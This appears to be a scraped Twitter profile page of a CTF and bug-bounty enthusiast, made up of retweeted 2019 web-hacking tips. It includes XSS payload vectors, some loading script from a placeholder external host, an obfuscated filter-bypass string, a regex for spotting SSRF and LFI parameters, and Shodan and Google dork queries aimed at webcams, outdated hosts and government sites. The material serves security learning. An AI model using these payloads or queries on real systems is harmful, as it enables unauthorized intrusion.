Don't be script kiddie

@M0sabMusi0

Interested in | CTF Lover Noob!

127.0.0.1
Joined: April 2017

Tweets


  1. Retweeted
    14 Dec 2019

    I am exploring fuzzing, started with this

  2. Retweeted
    1 Dec 2019

    Some of my favourite Google dorks: inurl:aspx "search" Take some from: Then adding 'inurl:gov' can show some interesting results too.

  3. Retweeted
    27 Nov 2019
  4. Retweeted
    26 Nov 2019

    [] [1/n] I encountered child porn in a telegram channel. Here's how I found the admin - Went through group history, found 2 interesting links - Link #1 - A TG channel for android wallpapers - Link #2 - WhatsApp group invite for a group dedicated to looting Amazon deals

  5. Retweeted
    24 Nov 2019

    [2/2] - Recon should be automated as much as it can be. Meanwhile, you can read their product/API docs, mess around - Make a checklist of components such as their session management, their checkout mechanism. Never use a vulnerability checklist unless it's component based. - Hack

  6. Retweeted
    24 Nov 2019

    My Methodology, an overview [1/2] - Use the product, see what it has to offer, note down the components that seem interesting - Take your time doing recon, don't rush. Find everything from the subdomains to what technologies they use from their job posting page.

  7. Retweeted
    20 Nov 2019

    I M P O R T A N T This is a collection of nearly all known attack techniques against JWT. It also includes a tool to automate all checks and even a JWT primer.

  8. Retweeted
    20 Nov 2019

    This technique is so useful, especially with race conditions ❤️ "send the whole of every request except the last byte, then, when they're all ready, 'release' each request by sending the last byte." Kudos to for his streak of awesome work.

  9. Retweeted
    23 Nov 2019
  10. Retweeted
    22 Nov 2019

    Shodan Cheat Sheet hostname: title:"webcam login" net:13.227.143.0/24 os:"windows xp" port:80 city:tokyo org:microsoft country:IN (use abbreviations such as US and NZ) has_screenshot:true (only returns results that have a screenshot available

  11. Retweeted
    26 Nov 2019

    Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect: Burp Search > Regex \?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w]) Suggestions are welcome.

  12. Retweeted
    26 Nov 2019

    See-SURF: Python based scanner to find potential SSRF parameters

  14. Retweeted
    7 Nov 2019

    New little recon tool - Automate the usage of MassDNS, Masscan, and nmap to filter out unreachable hosts + generate prepared lists of live URLs, IPs, domains, and services for further targeting.

  15. Retweeted
    10 Nov 2019

    Arjun : HTTP parameter discovery suite (Typical scan takes 30 sec with huge list of 25,980 param' names) : cc

  17. Retweeted
    5 Nov 2019

    Hacking Tools Cheat Sheet.

  18. Retweeted
    6 Nov 2019

    All script-based vectors. (HTML, no events) <script>alert(1)// <script>alert(1)<!-- <script>alert(1)%0A--> <script src=data:,alert(1)> <script src=//HOST/FILE> <script src=https:DOMAIN/FILE> <svg><script xlink:href=//HOST/FILE> <svg><script xlink:href=https:DOMAIN/FILE>

  19. Retweeted
    30 Oct 2019

    <scRiPt/💯<iMg="><">/*</sCRipt*<srC= */(prompt)``</ScripT

  20. Retweeted
    30 Oct 2019

    XSS classification model - Types of Cross-Site Scripting
